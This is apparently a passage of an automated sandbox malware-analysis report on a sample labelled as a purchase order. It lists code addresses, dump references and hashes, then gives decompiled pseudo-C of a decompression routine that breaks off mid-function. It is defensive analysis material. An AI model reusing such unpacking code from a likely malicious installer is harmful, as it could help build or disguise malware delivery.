                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00000000
                      0x0040676f
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x00000000
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00406811
                      0x00000000
                      0x00406686

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                      • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                      • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
